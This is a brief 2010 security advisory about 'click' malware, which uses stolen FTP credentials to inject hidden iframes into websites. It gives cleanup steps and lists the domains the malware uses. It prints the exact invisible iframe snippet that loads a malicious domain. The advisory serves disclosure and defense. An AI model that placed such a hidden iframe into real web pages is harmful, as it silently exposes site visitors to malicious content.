Updated: April 5, 2010
The click malware places an iframe into a website's web pages. Each instance of the iframe on the website is given a unique value for the click parameter in its URL. To clean the website, the website needs to be reverted to a clean backup or the malicious code need to be removed from the web pages. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected the FTP password needs to be changed and the malware removed from the infected computer before it used again to access the website via FTP.
Current Iframe Format:
<iframe src="http://dakilfu.com/?click=1248EE5" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Domains Used by the Malware: goooogleadsence.biz, openstats.info, durnosy.com, beidzan.com, maislex.net, efradin.net, saarcop.net, nipkelo.net, asfirey.net, warpiln.net, hantder.com, rabetis.net, fabujob.com, zymkasi.com, niklejo.net, erapost.net, hulmeux.net, kebsyno.com, likkiaz.net, ahbazen.net, ezadguf.net, koinzux.net, vistersearch.info, msnupdateserver.info, clodaib.com, internetcountercheck.com, odiklaf.com, marazuo.net, hostverify.net, dakilfu.net
Virus Scan Identifications:HTML:Iframe-inf, JS/IFrame.gen